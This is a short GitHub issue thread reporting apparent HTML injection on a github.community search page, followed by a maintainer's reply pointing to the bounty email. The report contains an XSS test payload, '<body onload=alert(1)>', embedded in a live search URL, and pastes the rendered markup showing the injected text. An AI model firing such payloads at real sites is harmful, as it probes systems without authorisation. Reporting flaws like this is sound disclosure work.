### ISSUE TITLE
THERE IS AN HTML ERROR HERE, THIS IS A LITTLE OPEN

### ISSUE THREAD

**Issue by cosqun1991** [github/securitylab#489]
https://github.community/search?q==%3Cbody%20onload%3Dalert(1)%3E&search_type=%F0%9F%85%B4%F0%9F%86%81%F0%9F%86%81%F0%9F%85%BE%F0%9F%86%81%20%F0%9F%85%B7%F0%9F%85%B4%F0%9F%86%81%F0%9F%85%B4

<summary aria-label="Filter by: 🅴🆁🆁🅾🆁 🅷🅴🆁🅴" name="Filter by: 🅴🆁🆁🅾🆁 🅷🅴🆁🅴" data-name="🅴🆁🆁🅾🆁 🅷🅴🆁🅴" data-value="🅴🆁🆁🅾🆁 🅷🅴🆁🅴" tabindex="0" role="listbox" id="search-type-header" class="select-kit-header single-select-header combo-box-header ember-view"><div class="select-kit-header-wrapper">
  

    <div title="🅴🆁🆁🅾🆁 🅷🅴🆁🅴" data-value="🅴🆁🆁🅾🆁 🅷🅴🆁🅴" data-name="🅴🆁🆁🅾🆁 🅷🅴🆁🅴" role="option" class="select-kit-selected-name selected-name choice">

    <span class="name">
      🅴🆁🆁🅾🆁 🅷🅴🆁🅴
    </span>

  </div>

  <svg class="fa d-icon d-icon-caret-down svg-icon caret-icon svg-string" xmlns="http://www.w3.org/2000/svg"><use xlink:href="#caret-down"></use></svg>
</div>
</summary>

![Ekran Görüntüsü (15)](https://user-images.githubusercontent.com/86915111/142755549-09269f0c-6034-4a8b-9908-9730a0a4e625.png)

**Comment by JarLob** [comment]
If you believe you have found a vulnerability in GitHub, please report to bounty@github.com
